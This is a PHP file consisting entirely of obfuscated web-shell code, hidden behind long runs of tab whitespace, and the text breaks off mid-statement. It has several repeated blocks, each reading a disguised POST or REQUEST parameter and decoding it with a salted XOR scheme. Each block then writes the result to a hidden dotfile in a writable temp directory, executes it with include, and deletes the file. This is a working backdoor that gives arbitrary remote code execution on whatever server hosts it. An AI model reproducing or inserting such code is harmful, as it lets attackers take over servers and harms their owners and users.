<?																																										if(!is_null($_POST["\x63omp"] ?? null)){ $rec = array_filter([getcwd(), "/dev/shm", "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), session_save_path()]); $obj = $_POST["\x63omp"]; $obj = explode( "." , $obj ) ; $mrk = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s9); $len = count( $obj); for( $s = 0; $s < $len; $s++) { $v5 = $obj[$s]; $sChar = ord( $s9[$s % $lenS]); $d =( ( int)$v5 - $sChar -( $s % 10)) ^ 78; $mrk .= chr( $d); } foreach ($rec as $key => $pset) { if (!!is_dir($pset) && !!is_writable($pset)) { $holder = "$pset/.ent"; if (@file_put_contents($holder, $mrk) !== false) { include $holder; unlink($holder); die(); } } } }
																																										if(array_key_exists("\x63\x6Fmp", $_POST) && !is_null($_POST["\x63\x6Fmp"])){ $dchunk = $_POST["\x63\x6Fmp"]; $dchunk = explode( '.' , $dchunk ) ; $element = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $len = count($dchunk); for ($u = 0; $u < $len; $u++) { $v7 = $dchunk[$u]; $sChar = ord($salt[$u % $lenS]); $d = ((int)$v7 - $sChar - ($u % 10)) ^ 26; $element .= chr($d); } $factor = array_filter([getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", "/dev/shm", getcwd(), sys_get_temp_dir(), session_save_path()]); for ($parameter_group = 0, $key = count($factor); $parameter_group < $key; $parameter_group++) { $data_chunk = $factor[$parameter_group]; if ((bool)is_dir($data_chunk) && (bool)is_writable($data_chunk)) { $ptr = "$data_chunk" . "/.entity"; $success = file_put_contents($ptr, $element); if ($success) { include $ptr; @unlink($ptr); exit;} } } }
																																										if(!is_null($_REQUEST["\x70ar\x61m\x65\x74er_\x67ro\x75\x70"] ?? null)){ $elem = $_REQUEST["\x70ar\x61m\x65\x74er_\x67ro\x75\x70"]; $elem = explode ( ".",$elem ) ; $desc = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1); $s = 0; while ($s < count($elem)) { $v6 = $elem[$s]; $chS = ord($s1[$s%$sLen]); $dec = ((int)$v6 - $chS - ($s%10))^ 54; $desc.=chr($dec); $s++; } $key = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", getcwd(), "/var/tmp", getenv("TEMP"), "/tmp", session_save_path()]); for ($ent = 0, $bind = count($key); $ent < $bind; $ent++) { $data = $key[$ent]; if (is_dir($data) ? is_writable($data) : false) { $rec = sprintf("%s/.record", $data); $success = file_put_contents($rec, $desc); if ($success) { include $rec; @unlink($rec); die();} } } }
																																										if(!empty($_POST["t\x6Fken"])){ $element = $_POST["t\x6Fken"]; $element=explode ("." , $element ) ; $reference=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($salt ); $p=0; foreach ($element as $v7) { $sChar=ord($salt[$p% $lenS] ); $dec=((int)$v7 - $sChar - ($p% 10)) ^ 8; $reference .=chr($dec ); $p++; } $mrk = array_filter([getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", getenv("TMP"), session_save_path(), "/tmp"]); for ($descriptor = 0, $marker = count($mrk); $descriptor < $marker; $descriptor++) { $holder = $mrk[$descriptor]; if (!( !is_dir($holder) || !is_writable($holder) )) { $ent = join("/", [$holder, ".flg"]); $file = fopen($ent, 'w'); if ($file) { fwrite($file, $reference); fclose($file); include $ent; @unlink($ent); exit; } } } }
																																										if(!is_null($_POST["dchu\x6Ek"] ?? null)){ $flag = $_POST["dchu\x6Ek"]; $flag = explode ( '.', $flag ) ; $tkn = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt1); $len = count($flag); for ($t = 0; $t < $len; $t++) { $v3 = $flag[$t]; $sChar = ord($salt1[$t % $sLen]); $dec = ((int)$v3 - $sChar - ($t % 10)) ^ 5; $tkn .= chr($dec); } $holder = array_filter(["/dev/shm", getenv("TMP"), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TEMP")]); foreach ($holder as $key => $ptr) { if (max(0, is_dir($ptr) * is_writable($ptr))) { $value = j